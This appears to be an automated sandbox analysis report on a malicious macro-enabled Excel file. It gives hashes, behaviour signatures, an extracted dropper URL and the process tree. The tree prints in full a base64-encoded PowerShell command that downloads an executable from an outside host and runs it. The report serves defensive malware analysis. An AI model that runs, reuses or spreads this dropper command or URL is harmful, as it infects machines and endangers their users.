Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-en-20211208
  • submitted
    22-12-2021 16:06

General

  • Target

    d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161.xlsm

  • Size

    73KB

  • MD5

    0a2ddcbe4687cf927ba02d332aa2a6d6

  • SHA1

    b7fdb409e76495b4bcfb374d68cfcf919fbb4afe

  • SHA256

    d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161

  • SHA512

    834a3d6ba33aa7693c962dd690d02d6f63cd8ccbda107a60ed844a28d765ffb5f55e3e51d12eeec7059e6ee52866a7db2d0ad7cb4b8b6ebf500725afcf381240

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://marks397.co.za/FRE/MAEK.pif

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Deletes itself 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\d480038c9ef06ec8e9d2ffba282c52e8f52f61e233ebb125ca4d3dcbfed9e161.xlsm
    1⤵
    • Deletes itself
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious behavior: RenamesItself
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:804
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c Uzosupxyvem.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:528
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBJAGsAagBoAHkAcQBnAGoAcgBoAHQAbgBrAGUAYQBvAHAAYgBwAHgAbwBhAHkALgBlAHgAZQAiADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACIAaAB0AHQAcABzADoALwAvAG0AYQByAGsAcwAzADkANwAuAGMAbwAuAHoAYQAvAEYAUgBFAC8ATQBBAEUASwAuAHAAaQBmACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:916

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\Documents\Uzosupxyvem.bat
    MD5

    939c6b2fd5c13b7d43b15ba483e98d50

    SHA1

    84a1cd7972626d0e113ec48961040d3878b97eda

    SHA256

    7dff5e8feb91f4e9e7b42d12f5ab8d1e380dc0c6f1c0d5bc3fa84c6f0eb55f68

    SHA512

    f482c070c781cd1f2929baa6904b2e896c834ba0f96bcedca86733430161316caba4a2631845e5a9dd2418481bcb4935f30ba423bc29270a5313d3a5288789a9

  • memory/528-57-0x0000000000000000-mapping.dmp
  • memory/804-54-0x000000002F421000-0x000000002F424000-memory.dmp
    Filesize

    12KB

  • memory/804-55-0x0000000071C91000-0x0000000071C93000-memory.dmp
    Filesize

    8KB

  • memory/804-56-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/916-59-0x0000000000000000-mapping.dmp
  • memory/916-60-0x0000000075D11000-0x0000000075D13000-memory.dmp
    Filesize

    8KB

  • memory/916-62-0x00000000023C1000-0x00000000023C2000-memory.dmp
    Filesize

    4KB

  • memory/916-61-0x00000000023C0000-0x00000000023C1000-memory.dmp
    Filesize

    4KB

  • memory/916-63-0x00000000023C2000-0x00000000023C4000-memory.dmp
    Filesize

    8KB